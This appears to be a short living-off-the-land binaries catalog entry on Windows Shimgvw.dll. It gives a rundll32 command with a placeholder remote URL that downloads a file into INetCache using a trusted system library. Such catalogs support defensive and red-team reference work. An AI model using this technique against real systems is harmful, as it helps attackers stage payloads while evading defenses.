Shimgvw.dll

Photo Gallery Viewer

Paths

  • c:\windows\system32\shimgvw.dll
  • c:\windows\syswow64\shimgvw.dll

Commands

Download

Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.

Use case: Download file from remote location.

Privileges: User

rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe}

Detection

Resources